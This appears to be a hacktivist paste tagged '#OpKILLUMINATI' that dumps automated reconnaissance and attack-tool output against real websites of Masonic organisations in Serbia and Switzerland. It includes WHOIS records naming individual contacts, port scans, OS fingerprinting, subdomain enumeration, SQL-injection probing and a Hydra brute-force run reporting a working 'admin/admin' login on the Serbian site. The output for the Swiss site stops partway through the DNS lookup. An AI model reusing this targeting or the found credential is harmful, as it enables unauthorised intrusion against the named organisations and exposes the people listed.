Anonymous V.S BlackHats JTSEC full Target #OpKILLUMINATI #5

1. ######################################################################################################################################
2. Hostname www.mason.org.rs ISP Loopia AB (AS39570)
3. Continent Europe Flag
4. SE
5. Country Sweden Country Code SE (SWE)
6. Region Unknown Local time 07 Jan 2018 16:30 CET
7. City Unknown Latitude 59.325
8. IP Address 194.9.94.152 Longitude 18.056
9. ######################################################################################################################################
10. [i] Scanning Site: http://mason.org.rs
11.  
12.  
13.  
14. B A S I C I N F O
15. ====================
16.  
17.  
18. [+] Site Title:
19. [+] IP address: 194.9.94.152
20. [+] Web Server: Could Not Detect
21. [+] CMS: Joomla
22. [+] Cloudflare: Not Detected
23. [+] Robots File: Found
24.  
25. -------------[ contents ]----------------
26. # If the Joomla site is installed within a folder
27. # eg www.example.com/joomla/ then the robots.txt file
28. # MUST be moved to the site root
29. # eg www.example.com/robots.txt
30. # AND the joomla folder name MUST be prefixed to all of the
31. # paths.
32. # eg the Disallow rule for the /administrator/ folder MUST
33. # be changed to read
34. # Disallow: /joomla/administrator/
35. #
36. # For more information about the robots.txt standard, see:
37. # http://www.robotstxt.org/orig.html
38. #
39. # For syntax checking, see:
40. # http://tool.motoricerca.info/robots-checker.phtml
41.  
42. User-agent: *
43. Disallow: /administrator/
44. Disallow: /bin/
45. Disallow: /cache/
46. Disallow: /cli/
47. Disallow: /components/
48. Disallow: /includes/
49. Disallow: /installation/
50. Disallow: /language/
51. Disallow: /layouts/
52. Disallow: /libraries/
53. Disallow: /logs/
54. Disallow: /modules/
55. Disallow: /plugins/
56. Disallow: /tmp/
57.  
58.  
59. -----------[end of contents]-------------
60.  
61.  
62.  
63. W H O I S L O O K U P
64. ========================
65.  
66. %
67. %This is the RNIDS Whois server.
68. %
69. % Date Format : DD.MM.YYYY
70. % Whois Server Version: 1.0.0
71. %
72. % Rights restricted by copyright.
73. % See http://www.rnids.rs/whois_en
74. %
75. %
76. %
77. % Ovo je odgovor od RNIDS Whois servera.
78. %
79. % Format datuma : DD.MM.YYYY
80. % Verzija Whois Servera : 1.0.0
81. %
82. % Sva prava zadržana. Za više informacija.
83. % pogledajte http://www.rnids.rs/whois_sr
84.  
85. Domain name: mason.org.rs
86. Domain status: Active
87. Registration date: 20.05.2009 09:25:05
88. Modification date: 20.04.2017 15:43:53
89. Expiration date: 20.05.2018 09:25:05
90. Registrar: Loopia d.o.o.
91.  
92.  
93. Registrant: Velika Nacionalna Loza Srbije
94. Address: Sajmiste Bb, Beograd, Serbia
95. ID Number: 17704974
96. Tax ID: 105454946
97.  
98.  
99. DNS: ns1.loopia.se - 93.188.0.20
100. DNS: ns2.loopia.se - 93.188.0.21
101. DNS: ns3.loopia.se - 194.9.94.245
102. DNS: ns4.loopia.se - 194.9.95.245
103.  
104.  
105. Administrative contact: Voja Milicevic, Velika Nacionalna Loza Srbije
106. Address: Sajmiste Bb, Beograd, Serbia
107.  
108. Technical contact: Dijana Todorović, Loopia d.o.o.
109. Address: Obrenovićeva 46, TPC KALČA C1/72, Nis, Serbia
110.  
111.  
112.  
113.  
114. G E O I P L O O K U P
115. =========================
116.  
117. [i] IP Address: 194.9.94.152
118. [i] Country: SE
119. [i] State: N/A
120. [i] City: N/A
121. [i] Latitude: 59.324699
122. [i] Longitude: 18.056000
123.  
124.  
125.  
126.  
127. H T T P H E A D E R S
128. =======================
129.  
130.  
131. [i] HTTP/1.1 200 OK
132. [i] Server: nginx/1.12.1
133. [i] Date: Sun, 07 Jan 2018 15:48:06 GMT
134. [i] Content-Type: text/html; charset=utf-8
135. [i] Connection: close
136. [i] Vary: X-Forwarded-For
137. [i] X-Powered-By: PHP/5.6.30
138. [i] Set-Cookie: 649c1dfc682d5288fa34186a03dbd086=sf5r79gel8kf1lal33gf0cbai1; path=/; HttpOnly
139. [i] Expires: Wed, 17 Aug 2005 00:00:00 GMT
140. [i] Last-Modified: Sun, 07 Jan 2018 15:48:06 GMT
141. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
142. [i] Pragma: no-cache
143.  
144.  
145.  
146.  
147. D N S L O O K U P
148. ===================
149.  
150. mason.org.rs. 299 IN A 194.9.94.152
151. mason.org.rs. 299 IN RRSIG A 8 3 300 20180118000000 20171228000000 7374 mason.org.rs. fviYTfkyqFYQ+pNqFbVEAMAGs4MGMTyi+Wsx751pnPI9iW75BPsDHHKm i9De+/3VV2ONy6cvx+9ljS0L94QIuSRZEa6o1Mwin/HWmz9hDsmSTeY0 gOYjoq0cZuPmdlAH/QK5Ljrhfku9gqqqjQFu5f0HhFUkptvZiO1Fsire yxI=
152. mason.org.rs. 3599 IN NS ns1.loopia.se.
153. mason.org.rs. 3599 IN NS ns2.loopia.se.
154. mason.org.rs. 3599 IN RRSIG NS 8 3 3600 20180118000000 20171228000000 7374 mason.org.rs. h4ccyyQyZj58q0Ljvk+exj++cDOJgXpaeURhi8hhOeYJVw0erHibnyIa y3YXUNW+nv8WvZn+eAW3jIthzVwdw9iwXNdlxbMGXn2zCUC2K8QmJqxv zFgTLXbrrD2kD2CZ8SpCSRouvLwdH/3wVbR1vsPwSsqv4Qn9tWVKSJEQ dzA=
155. mason.org.rs. 3599 IN SOA ns1.loopia.se. registry.loopia.se. 1515024000 10800 3600 604800 86400
156. mason.org.rs. 3599 IN RRSIG SOA 8 3 3600 20180118000000 20171228000000 7374 mason.org.rs. PDB0nhAbGHsjDscjiM4dZqyz+aj0EmaHE86zR2t3frLKBH0fA3DFLS9u bUSIN7Y4ZB1KZqE2GyaB791nkRzn2tYU2xwVRV2S3QWuS/ej4aVesAYK dvP9r6PPfv+RE28fBQoiNTcMWWVPe8+rGdiQi5B8SVlQHX+TFyycr0cE cX0=
157. mason.org.rs. 299 IN MX 10 mail.mason.org.rs.
158. mason.org.rs. 299 IN MX 20 mail2.mason.org.rs.
159. mason.org.rs. 299 IN RRSIG MX 8 3 300 20180118000000 20171228000000 7374 mason.org.rs. n3Ehcd5hSCG5PKjMZyuKJIbSfgqckzJLzB+V2XxJS0RO3OmJtMUHsQ+d zxl3VvJjLB1JDid7wZuOW3FZxIUzBnovISPQqMa7bdQOy/e8eeXcnnm4 gREVq3H/MyNFtHjx8HEH/VsarUmEy1esL8IVTJyvvexm67O/BmI42hqf kdQ=
160. mason.org.rs. 21599 IN DNSKEY 257 3 8 AwEAAclIpBWZzC2Q9emw7p5YJZs7PcdWC2apU59ndPue84ZlPk1k/y2O 1khqMlOsJXrCsWJuZ3BCQ77rCu0oEURDgKQi15mNIb0KI4d9BJVojL47 a+FuGw6ZIKjBm4EYr84BvOHvmju9tPkSV/lYM8oA5wndi/tjSXazETP/ 4lFI5jFT5KOF8EwRRtN9oh7Jtrv1OhS22UEkwk3Ozc8o2guYkJH3Ei9g 0zXyluUC7QA5W5XaItxDXuLfSvF5aW5mzxSPWucbxLddJXd5EdQaPOEp l1M+6dab+VRdW4ywxb8BDztEPDeV2vs6iLrz4PmGDtC3mHlfXcMdjgl2 O5dPHTKib6k=
161. mason.org.rs. 21599 IN DNSKEY 256 3 8 AwEAAdEXkZWeKvb/C238SHG+I2YKpkjq1/GmGCSy+XY6PD+cQtHJo0Dn viEEb2DB8RJ81Rpw5PBb0w/ZtBkr8Y9UoDDFZQgKv0I4kHp8gCjcKUg2 jh170H4ifpFTQhUV7mAsdMWEhd9z9LPc4uOMvqSIQ7hD6p94T7xlhNho APyW03w1
162. mason.org.rs. 21599 IN DNSKEY 256 3 8 AwEAAerypN+7gI8SoHE4KcTqDI9NAg7wC/qG/B0oe2Ws0imPx0LCpDvj PXaqN63nhpCLD032e9qH+BoiyGC8/3oT2ht0hfJFJzrwbgrmnbGCJL1i +/tWKCz8PGW0plcsZ98hCArQObvMF1XcwV7FVmOisIE4vkeuAgUPArOT RMASioIb
163. mason.org.rs. 21599 IN RRSIG DNSKEY 8 3 86400 20180118000000 20171228000000 12412 mason.org.rs. mLX9+FGc8Z+kAREYIq9dv9gkZ/2GZE0awm5cti3KUsKiODL2uqjNiuBo L5EAOBslfwW8N/Uh9sSyBf2erekOPfKcIU/XpkP/KRGywE7W3DRjPY38 THIGSi8YdkKB/LL3L4yeajd7WPtxlKTQOOFqZ8lSHGmI4kQdyRN7t/Cj EoNbt0ifbjARmocEBQ5JhdKSTzW9Godl4aMD0pCGfce5uVJBt6iY1rin s85dx0NvRIBAVz0A2hY823xiZjIjyuHsyTKd0tKfhO+cukWkG7IVg8Ts 4bo/GTfZ7yfRgzKbXxE84YqQsJwogsn8k+jfwsU3VryeX4gQsVW4IOxl uQ5o7Q==
164. mason.org.rs. 21599 IN NSEC3PARAM 1 0 1 AB
165. mason.org.rs. 21599 IN RRSIG NSEC3PARAM 8 3 86400 20180118000000 20171228000000 7374 mason.org.rs. nn6/nCOqSS9PibVr8clJxzLjztgpRvnBkQ/vz5waTQ0DPwgGKV3IYMLi I1KndtzDpjPw9rmfOUnyflkaoQazI8OjjClrr2iiWPsH4nzrRoFL5OOB oJHr+Po+Af7fyZMlolWL0tygWB8BXTPNmwtFJe+JmRisaF7E0fgCTEXt c0c=
166.  
167.  
168.  
169.  
170. S U B N E T C A L C U L A T I O N
171. ====================================
172.  
173. Address = 194.9.94.152
174. Network = 194.9.94.152 / 32
175. Netmask = 255.255.255.255
176. Broadcast = not needed on Point-to-Point links
177. Wildcard Mask = 0.0.0.0
178. Hosts Bits = 0
179. Max. Hosts = 1 (2^0 - 0)
180. Host Range = { 194.9.94.152 - 194.9.94.152 }
181.  
182.  
183.  
184. N M A P P O R T S C A N
185. ============================
186.  
187.  
188. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-07 15:48 UTC
189. Nmap scan report for mason.org.rs (194.9.94.152)
190. Host is up (0.11s latency).
191. rDNS record for 194.9.94.152: s436.loopia.se
192. PORT STATE SERVICE VERSION
193. 21/tcp filtered ftp
194. 22/tcp filtered ssh
195. 23/tcp filtered telnet
196. 25/tcp filtered smtp
197. 80/tcp open http nginx 1.12.1
198. 110/tcp filtered pop3
199. 143/tcp filtered imap
200. 443/tcp open ssl/http nginx 1.12.1
201. 445/tcp filtered microsoft-ds
202. 3389/tcp filtered ms-wbt-server
203.  
204. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
205. Nmap done: 1 IP address (1 host up) scanned in 15.38 seconds
206. Enter the target: http://www.mason.org.rs/
207. [!] IP Address : 194.9.94.152
208. [!] Server: nginx/1.12.1
209. [!] Powered By: PHP/5.6.30
210. [-] Clickjacking protection is not in place.
211. [!] www.mason.org.rs doesn't seem to use a CMS
212. [+] Honeypot Probabilty: 0%
213. ----------------------------------------
214. PORT STATE SERVICE VERSION
215. 21/tcp filtered ftp
216. 22/tcp filtered ssh
217. 23/tcp filtered telnet
218. 25/tcp filtered smtp
219. 80/tcp open http nginx 1.12.1
220. 110/tcp filtered pop3
221. 143/tcp filtered imap
222. 443/tcp open ssl/http nginx 1.12.1
223. 445/tcp filtered microsoft-ds
224. 3389/tcp filtered ms-wbt-server
225. ----------------------------------------
226.  
227. [+] DNS Records
228.  
229. [+] Host Records (A)
230. www.mason.org.rsHTTP: (s436.loopia.se) (194.9.94.152) AS39570 Loopia AB Sweden
231.  
232. [+] TXT Records
233.  
234. [+] DNS Map: https://dnsdumpster.com/static/map/mason.org.rs.png
235.  
236. [>] Initiating 3 intel modules
237. [>] Loading Alpha module (1/3)
238. [>] Beta module deployed (2/3)
239. [>] Gamma module initiated (3/3)
240.  
241.  
242. [+] Emails found:
243. ------------------
244. pixel-151534009481492-web-@www.mason.org.rs
245. pixel-1515340100556472-web-@www.mason.org.rs
246. No hosts found
247. [+] Virtual hosts:
248. -----------------
249. [>] Crawling the target for fuzzable URLs
250. [+] Found 11 fuzzable URLs
251. http://www.mason.org.rs///index.php?limit=10&start=10
252. [>] Using SQLMap api to check for SQL injection vulnerabilities. Don't
253. worry we are using an online service and it doesn't depend on your internet connection.
254. This scan will take 2-3 minutes.
255. 92m====================================================================================
256.  RUNNING NSLOOKUP 
257. ====================================================================================
258. Server: 192.168.1.254
259. Address: 192.168.1.254#53
260.  
261. Non-authoritative answer:
262. Name: mason.org.rs
263. Address: 194.9.94.152
264.  
265. mason.org.rs has address 194.9.94.152
266. mason.org.rs mail is handled by 20 mail2.mason.org.rs.
267. mason.org.rs mail is handled by 10 mail.mason.org.rs.
268. ====================================================================================
269.  CHECKING OS FINGERPRINT 
270. ====================================================================================
271.  
272. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
273.  
274. [+] Target is mason.org.rs
275. [+] Loading modules.
276. [+] Following modules are loaded:
277. [x] [1] ping:icmp_ping - ICMP echo discovery module
278. [x] [2] ping:tcp_ping - TCP-based ping discovery module
279. [x] [3] ping:udp_ping - UDP-based ping discovery module
280. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
281. [x] [5] infogather:portscan - TCP and UDP PortScanner
282. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
283. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
284. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
285. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
286. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
287. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
288. [x] [12] fingerprint:smb - SMB fingerprinting module
289. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
290. [+] 13 modules registered
291. [+] Initializing scan engine
292. [+] Running scan engine
293. [-] ping:tcp_ping module: no closed/open TCP ports known on 194.9.94.152. Module test failed
294. [-] ping:udp_ping module: no closed/open UDP ports known on 194.9.94.152. Module test failed
295. [-] No distance calculation. 194.9.94.152 appears to be dead or no ports known
296. [+] Host: 194.9.94.152 is up (Guess probability: 50%)
297. [+] Target: 194.9.94.152 is alive. Round-Trip Time: 9.71941 sec
298. [+] Selected safe Round-Trip Time value is: 19.43883 sec
299. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
300. [-] fingerprint:smb need either TCP port 139 or 445 to run
301. [+] Primary guess:
302. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.8" (Guess probability: 91%)
303. [+] Other guesses:
304. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.4" (Guess probability: 91%)
305. [+] Host 194.9.94.152 Running OS: "FreeBSD 5.2" (Guess probability: 91%)
306. [+] Host 194.9.94.152 Running OS: (Guess probability: 91%)
307. [+] Host 194.9.94.152 Running OS: "FreeBSD 5.3" (Guess probability: 91%)
308. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.6" (Guess probability: 91%)
309. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.7" (Guess probability: 91%)
310. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.7" (Guess probability: 91%)
311. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.6" (Guess probability: 91%)
312. [+] Host 194.9.94.152 Running OS: "FreeBSD 5.3" (Guess probability: 91%)
313. [+] Cleaning up scan engine
314. [+] Modules deinitialized
315. [+] Execution completed.
316. ====================================================================================
317.  GATHERING WHOIS INFO 
318. ====================================================================================
319. %
320. %This is the RNIDS Whois server.
321. %
322. % Date Format : DD.MM.YYYY
323. % Whois Server Version: 1.0.0
324. %
325. % Rights restricted by copyright.
326. % See http://www.rnids.rs/whois_en
327. %
328. %
329. %
330. % Ovo je odgovor od RNIDS Whois servera.
331. %
332. % Format datuma : DD.MM.YYYY
333. % Verzija Whois Servera : 1.0.0
334. %
335. % Sva prava zadržana. Za više informacija.
336. % pogledajte http://www.rnids.rs/whois_sr
337.  
338. Domain name: mason.org.rs
339. Domain status: Active
340. Registration date: 20.05.2009 09:25:05
341. Modification date: 20.04.2017 15:43:53
342. Expiration date: 20.05.2018 09:25:05
343. Registrar: Loopia d.o.o.
344.  
345.  
346. Registrant: Velika Nacionalna Loza Srbije
347. Address: Sajmiste Bb, Beograd, Serbia
348. ID Number: 17704974
349. Tax ID: 105454946
350.  
351.  
352. DNS: ns1.loopia.se - 93.188.0.20
353. DNS: ns2.loopia.se - 93.188.0.21
354. DNS: ns3.loopia.se - 194.9.94.245
355. DNS: ns4.loopia.se - 194.9.95.245
356.  
357.  
358. Administrative contact: Voja Milicevic, Velika Nacionalna Loza Srbije
359. Address: Sajmiste Bb, Beograd, Serbia
360.  
361. Technical contact: Dijana Todorović, Loopia d.o.o.
362. Address: Obrenovićeva 46, TPC KALČA C1/72, Nis, Serbia
363. ====================================================================================
364.  GATHERING OSINT INFO 
365. ====================================================================================
366.  
367. *******************************************************************
368. * *
369. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
370. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
371. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
372. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
373. * *
374. * TheHarvester Ver. 2.7 *
375. * Coded by Christian Martorella *
376. * Edge-Security Research *
377. * cmartorella@edge-security.com *
378. *******************************************************************
379.  
380.  
381. Full harvest..
382. [-] Searching in Google..
383. Searching 0 results...
384. [-] Searching in PGP Key server..
385. [-] Searching in Bing..
386.  
387. ******************************************************
388. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
389. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
390. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
391. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
392. * |___/ *
393. * Metagoofil Ver 2.2 *
394. * Christian Martorella *
395. * Edge-Security.com *
396. * cmartorella_at_edge-security.com *
397. ******************************************************
398.  
399. [-] Starting online search...
400.  
401. [-] Searching for doc files, with a limit of 25
402. Searching 100 results...
403. Results: 0 files found
404. Starting to download 25 of them:
405. ----------------------------------------
406.  
407.  
408. [-] Searching for pdf files, with a limit of 25
409. Searching 100 results...
410. Results: 0 files found
411. Starting to download 25 of them:
412. ----------------------------------------
413.  
414.  
415. [-] Searching for xls files, with a limit of 25
416. Searching 100 results...
417. Results: 0 files found
418. Starting to download 25 of them:
419. ----------------------------------------
420.  
421.  
422. [-] Searching for csv files, with a limit of 25
423. Searching 100 results...
424. Results: 0 files found
425. Starting to download 25 of them:
426. ----------------------------------------
427.  
428.  
429. [-] Searching for txt files, with a limit of 25
430. Searching 100 results...
431. Results: 0 files found
432. Starting to download 25 of them:
433. ----------------------------------------
434.  
435. processing
436. user
437. email
438.  
439. [+] List of users found:
440. --------------------------
441.  
442. [+] List of software found:
443. -----------------------------
444.  
445. [+] List of paths and servers found:
446. ---------------------------------------
447.  
448. [+] List of e-mails found:
449. ----------------------------
450. ====================================================================================
451.  GATHERING DNS INFO 
452. ====================================================================================
453.  
454. ; <<>> DiG 9.11.2-5-Debian <<>> -x mason.org.rs
455. ;; global options: +cmd
456. ;; Got answer:
457. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3001
458. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
459.  
460. ;; OPT PSEUDOSECTION:
461. ; EDNS: version: 0, flags:; udp: 4096
462. ;; QUESTION SECTION:
463. ;rs.org.mason.in-addr.arpa. IN PTR
464.  
465. ;; AUTHORITY SECTION:
466. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102539 1800 900 604800 3600
467.  
468. ;; Query time: 203 msec
469. ;; SERVER: 192.168.1.254#53(192.168.1.254)
470. ;; WHEN: Sun Jan 07 10:43:16 EST 2018
471. ;; MSG SIZE rcvd: 122
472.  
473. dnsenum VERSION:1.2.4
474. 
475. ----- mason.org.rs -----
476. 
477.  
478. Host's addresses:
479. __________________
480.  
481. mason.org.rs. 94 IN A 194.9.94.152
482. 
483.  
484. Name Servers:
485. ______________
486.  
487. ns1.loopia.se. 3598 IN A 93.188.0.20
488. ns2.loopia.se. 3600 IN A 93.188.0.21
489. 
490.  
491. Mail (MX) Servers:
492. ___________________
493.  
494. mail.mason.org.rs. 93 IN A 194.9.94.72
495. mail2.mason.org.rs. 93 IN A 194.9.94.3
496. 
497.  
498. Trying Zone Transfers and getting Bind Versions:
499. _________________________________________________
500.  
501. 
502. Trying Zone Transfer for mason.org.rs on ns1.loopia.se ...
503.  
504. Trying Zone Transfer for mason.org.rs on ns2.loopia.se ...
505.  
506. brute force file not specified, bay.
507. ====================================================================================
508.  GATHERING DNS SUBDOMAINS 
509. ====================================================================================
510. 
511. ____ _ _ _ _ _____
512. / ___| _ _| |__ | (_)___| |_|___ / _ __
513. \___ \| | | | '_ \| | / __| __| |_ \| '__|
514. ___) | |_| | |_) | | \__ \ |_ ___) | |
515. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
516.  
517. # Coded By Ahmed Aboul-Ela - @aboul3la
518.  
519. [-] Enumerating subdomains now for mason.org.rs
520. [-] verbosity is enabled, will show the subdomains results in realtime
521. [-] Searching now in Baidu..
522. [-] Searching now in Yahoo..
523. [-] Searching now in Google..
524. [-] Searching now in Bing..
525. [-] Searching now in Ask..
526. [-] Searching now in Netcraft..
527. [-] Searching now in DNSdumpster..
528. [-] Searching now in Virustotal..
529. [-] Searching now in ThreatCrowd..
530. [-] Searching now in SSL Certificates..
531. [-] Searching now in PassiveDNS..
532. Yahoo: www.mason.org.rs
533. ("bad handshake: SysCallError(-1, 'Unexpected EOF')",)
534. ("bad handshake: SysCallError(-1, 'Unexpected EOF')",)
535. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-mason.org.rs.txt
536. [-] Total Unique Subdomains Found: 1
537. www.mason.org.rs
538.  
539.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
540.  ║ ╠╦╝ ║ ╚═╗╠═╣
541.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
542. ====================================================================================
543.  GATHERING CERTIFICATE SUBDOMAINS 
544. ====================================================================================
545. 
546.  
547. [+] Domains saved to: /usr/share/sniper/loot/domains/domains-mason.org.rs-full.txt
548. 
549. ====================================================================================
550.  CHECKING FOR SUBDOMAIN HIJACKING 
551. ====================================================================================
552. ====================================================================================
553.  CHECKING EMAIL SECURITY 
554. ====================================================================================
555.  
556. ====================================================================================
557.  STARTING DOMAIN FLYOVER 
558. ====================================================================================
559. ====================================================================================
560.  STARTING PUBLIC S3 BUCKET SCAN 
561. ====================================================================================
562.  
563.  
564. ====================================================================================
565.  PINGING HOST 
566. ====================================================================================
567. PING mason.org.rs (194.9.94.152) 56(84) bytes of data.
568. 64 bytes from s436.loopia.se (194.9.94.152): icmp_seq=1 ttl=49 time=2821 ms
569.  
570. --- mason.org.rs ping statistics ---
571. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
572. rtt min/avg/max/mdev = 2821.181/2821.181/2821.181/0.000 ms
573.  
574. ====================================================================================
575.  RUNNING TCP PORT SCAN 
576. ====================================================================================
577.  
578. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 10:48 EST
579. Nmap done: 1 IP address (1 host up) scanned in 25.59 seconds
580.  
581. ====================================================================================
582.  RUNNING INTRUSIVE SCANS 
583. ====================================================================================
584.  
585. ====================================================================================
586.  SCANNING FOR COMMON VULNERABILITIES 
587. ====================================================================================
588. ====================================================================================
589.  SKIPPING FULL NMAP PORT SCAN 
590. ====================================================================================
591. ====================================================================================
592.  RUNNING BRUTE FORCE 
593. ====================================================================================
594.  __________ __ ____ ___
595.  \______ \_______ __ ___/ |_ ____ \ \/ /
596.  | | _/\_ __ \ | \ __\/ __ \ \ / 
597.  | | \ | | \/ | /| | \ ___/ / \ 
598.  |______ / |__| |____/ |__| \___ >___/\ \ 
599.  \/ \/ \_/
600.  
601.  + -- --=[BruteX v1.7 by 1N3
602.  + -- --=[http://crowdshield.com
603.  
604.  
605. ################################### Running Port Scan ##############################
606.  
607. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 10:48 EST
608. Nmap scan report for mason.org.rs (194.9.94.152)
609. Host is up (0.14s latency).
610. rDNS record for 194.9.94.152: s436.loopia.se
611. Not shown: 24 filtered ports
612. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
613. PORT STATE SERVICE
614. 80/tcp open http
615. 443/tcp open https
616.  
617. Nmap done: 1 IP address (1 host up) scanned in 3.79 seconds
618.  
619. ################################### Running Brute Force ############################
620.  
621.  + -- --=[Port 21 closed... skipping.
622.  + -- --=[Port 22 closed... skipping.
623.  + -- --=[Port 23 closed... skipping.
624.  + -- --=[Port 25 closed... skipping.
625.  + -- --=[Port 80 opened... running tests...
626. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
627.  
628. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-07 10:48:39
629. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
630. [DATA] attacking http-get://mason.org.rs:80//
631. [80][http-get] host: mason.org.rs login: admin password: admin
632. [STATUS] attack finished for mason.org.rs (valid pair found)
633. 1 of 1 target successfully completed, 1 valid password found
634. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-07 10:48:43
635.  + -- --=[Port 110 closed... skipping.
636.  + -- --=[Port 139 closed... skipping.
637.  + -- --=[Port 162 closed... skipping.
638.  + -- --=[Port 389 closed... skipping.
639.  + -- --=[Port 443 opened... running tests...
640. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
641.  
642. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-07 10:48:44
643. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
644. [DATA] attacking http-gets://mason.org.rs:443//
645. [443][http-get] host: mason.org.rs login: admin password: admin
646. [STATUS] attack finished for mason.org.rs (valid pair found)
647. 1 of 1 target successfully completed, 1 valid password found
648. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-07 10:48:50
649.  
650.  
651. ################################### Done! ###########################################
652.  
653. ====================================================================================
654.  SCAN COMPLETE! 
655. ====================================================================================
656.  
657. ######################################################################################################################################
658. Hostname www.francmaconnerie.ch ISP Infomaniak Network SA (AS29222)
659. Continent Europe Flag
660. CH
661. Country Switzerland Country Code CH (CHE)
662. Region Unknown Local time 07 Jan 2018 17:10 CET
663. City Unknown Latitude 47.145
664. IP Address 93.88.240.208 Longitude 8.155
665. ######################################################################################################################################
666. [i] Scanning Site: http://francmaconnerie.ch
667.  
668.  
669.  
670. B A S I C I N F O
671. ====================
672.  
673.  
674. [+] Site Title:
675. [+] IP address: 93.88.240.208
676. [+] Web Server: Apache
677. [+] CMS: Drupal
678. [+] Cloudflare: Not Detected
679. [+] Robots File: Found
680.  
681. -------------[ contents ]----------------
682. #
683. # robots.txt
684. #
685. # This file is to prevent the crawling and indexing of certain parts
686. # of your site by web crawlers and spiders run by sites like Yahoo!
687. # and Google. By telling these "robots" where not to go on your site,
688. # you save bandwidth and server resources.
689. #
690. # This file will be ignored unless it is at the root of your host:
691. # Used: http://example.com/robots.txt
692. # Ignored: http://example.com/site/robots.txt
693. #
694. # For more information about the robots.txt standard, see:
695. # http://www.robotstxt.org/robotstxt.html
696.  
697. User-agent: *
698. Crawl-delay: 10
699. # Directories
700. Disallow: /includes/
701. Disallow: /misc/
702. Disallow: /modules/
703. Disallow: /profiles/
704. Disallow: /scripts/
705. Disallow: /themes/
706. # Files
707. Disallow: /CHANGELOG.txt
708. Disallow: /cron.php
709. Disallow: /INSTALL.mysql.txt
710. Disallow: /INSTALL.pgsql.txt
711. Disallow: /INSTALL.sqlite.txt
712. Disallow: /install.php
713. Disallow: /INSTALL.txt
714. Disallow: /LICENSE.txt
715. Disallow: /MAINTAINERS.txt
716. Disallow: /update.php
717. Disallow: /UPGRADE.txt
718. Disallow: /xmlrpc.php
719. # Paths (clean URLs)
720. Disallow: /admin/
721. Disallow: /comment/reply/
722. Disallow: /filter/tips/
723. Disallow: /node/add/
724. Disallow: /search/
725. Disallow: /user/register/
726. Disallow: /user/password/
727. Disallow: /user/login/
728. Disallow: /user/logout/
729. # Paths (no clean URLs)
730. Disallow: /?q=admin/
731. Disallow: /?q=comment/reply/
732. Disallow: /?q=filter/tips/
733. Disallow: /?q=node/add/
734. Disallow: /?q=search/
735. Disallow: /?q=user/password/
736. Disallow: /?q=user/register/
737. Disallow: /?q=user/login/
738. Disallow: /?q=user/logout/
739.  
740. -----------[end of contents]-------------
741.  
742.  
743.  
744. W H O I S L O O K U P
745. ========================
746.  
747. The number of requests per client per time interval is
748. restricted. You have exceeded this limit.
749. Please wait a moment and try again.
750.  
751.  
752.  
753.  
754.  
755. G E O I P L O O K U P
756. =========================
757.  
758. [i] IP Address: 93.88.240.208
759. [i] Country: CH
760. [i] State: N/A
761. [i] City: N/A
762. [i] Latitude: 47.144901
763. [i] Longitude: 8.155100
764.  
765.  
766.  
767.  
768. H T T P H E A D E R S
769. ======================
770. [i] HTTP/1.1 403 Forbidden
771. [i] Date: Sun, 07 Jan 2018 16:22:15 GMT
772. [i] Server: Apache
773. [i] Vary: accept-language,accept-charset
774. [i] Accept-Ranges: bytes
775. [i] Connection: close
776. [i] Content-Type: text/html; charset=iso-8859-1
777. [i] Content-Language: en
778. [i] Expires: Sun, 07 Jan 2018 16:22:15 GMT
779.  
780.  
781.  
782.  
783. D N S L O O K U P
784. ===================
785.  
786. francmaconnerie.ch. 21599 IN SOA ns5.infomaniak.ch. hostmaster.infomaniak.ch. 2013081201 10800 3600 604800 86400
